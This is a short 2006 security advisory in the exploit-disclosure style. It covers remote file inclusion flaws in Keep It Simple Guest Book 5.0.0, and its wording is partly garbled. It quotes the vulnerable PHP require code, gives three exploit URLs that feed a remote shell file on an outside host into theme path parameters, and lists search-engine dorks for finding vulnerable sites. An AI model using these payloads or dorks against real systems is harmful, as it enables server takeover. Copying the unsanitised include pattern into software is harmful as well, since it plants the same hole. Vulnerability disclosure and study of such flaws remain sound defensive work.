###########################################################################<br># Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB<br>#<br># Author: 0o_zeus_o0 ( Arturo Z. )<br># Contact: <a href="mailto:zeus@diosdelared.com">
zeus@diosdelared.com</a><br># Website: <a href="http://www.diosdelared.com">www.diosdelared.com</a><br># Date: 22/12/06<br># Risk: critical<br># Vendor Url: <a href="http://sourceforge.net/projects/kisgb">http://sourceforge.net/projects/kisgb
</a>, <a href="http://ravenphpscripts.com">http://ravenphpscripts.com</a><br># Affected Software: Keep It Simple Guest Book<br># search: inurl:kisgb , intitle:KISGB<br>#<br>#Info:<br>##################################################################
<br>#Bug is risky by since it is possible to be included I cosay malisioso<br>#that allows to see or to modify the archives<br>#code:<br>#if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");
<br>#else require("$path_to_themes/$theme");<br>##################################################################<br>#<br>#<br>#http://site/path/gbpath/authenticate.php?path_to_themes=<a href="http://shellsite.com/php.gif">
http://shellsite.com/php.gif</a>?<br>#<br>#http://site/path/gbpath/admin.php?default_path_for_themes=<a href="http://shellsite.com/php.gif">http://shellsite.com/php.gif</a>?<br>#<br>#http://site/path/gbpath/upconfig.php?default_path_for_themes=
<a href="http://shellsite.com/php.gif">http://shellsite.com/php.gif</a>?<br>##################################################################<br>#VULNERABLE VERSIONS<br>##################################################################
<br># 5.0.0<br>#<br>##################################################################<br>#Contact information<br>#0o_zeus_o0<br>#zeus@<a href="http://diosdelared.com">diosdelared.com</a><br>#www.diosdelared.com<br>##################################################################
<br>#greetz: S.S.M, sams, a mi beba<br>#Original Advisory: <a href="http://diosdelared.com/15.txt">http://diosdelared.com/15.txt</a><br>##################################################################